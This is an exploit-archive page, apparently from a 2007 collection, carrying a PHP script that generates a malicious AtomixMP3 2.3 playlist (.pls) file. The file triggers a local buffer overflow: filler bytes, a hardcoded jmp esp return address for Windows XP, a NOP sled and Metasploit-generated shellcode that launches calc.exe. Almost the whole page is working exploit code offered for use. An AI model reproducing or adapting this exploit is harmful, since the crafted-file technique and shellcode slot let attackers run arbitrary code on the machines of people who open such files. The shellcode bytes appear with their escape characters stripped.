AtomixMP3 2.3 (pls File) Local Buffer OverFlow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : AtomixMP3 2.3 (pls File) Local Buffer OverFlow Exploit
# Published : 2007-09-05
# Author : 0x58
# Previous Title : Microsoft Visual Basic Enterprise Edition 6.0 SP6 Code Execution Exploit
# Next Title : OTSTurntables 1.00 (m3u File) Local Buffer Overflow Exploit

<?php
/*
AtomixMP3 2.3 (pls File) Local Buffer OverFlow
ret addr -> 0x77394540      jmp esp in mswsock.dll Winxp Pro Version 2002
exploit : [A x 516] +[EIP - jmp esp - 4] + [Nops -10] + [Shellcode ] 
By : 0x58
greetz : miyyet,,diablos5s5,,vxroot,,Str0ke,,Metasploit
Moroccan Hackers !
*/
# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
$shellcode = 
"x33xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13x84".
"xd1xfexd8x83xebxfcxe2xf4x78x39xbaxd8x84xd1x75x9d".
"xb8x5ax82xddxfcxd0x11x53xcbxc9x75x87xa4xd0x15x91".
"x0fxe5x75xd9x6axe0x3ex41x28x55x3exacx83x10x34xd5".
"x85x13x15x2cxbfx85xdaxdcxf1x34x75x87xa0xd0x15xbe".
"x0fxddxb5x53xdbxcdxffx33x0fxcdx75xd9x6fx58xa2xfc".
"x80x12xcfx18xe0x5axbexe8x01x11x86xd4x0fx91xf2x53".
"xf4xcdx53x53xecxd9x15xd1x0fx51x4exd8x84xd1x75xb0".
"xb8x8excfx2exe4x87x77x20x07x11x85x88xecx21x74xdc".
"xdbxb9x66x26x0exdfxa9x27x63xb2x9fxb4xe7xffx9bxa0".
"xe1xd1xfexd8";
$bof = str_repeat("A",516)."x40x45x39x77".str_repeat("x90",10).$shellcode;
$filename = "atomix.pls";
$file = fopen($filename,"w+");
fputs($file,"[playlist]rn");
fputs($file,"File1=".$bof."rn");
fputs($file,"Title1=".$bof."rn");
fputs($file,"Length1=".strlen($bof)."rn");
fputs($file,"NumberOfEntries=1");
fputs($file,"Version=2");
fclose($file);
echo "Exploit generated in : ".$filename."<br>";
?>

# www.Syue.com [2007-09-05]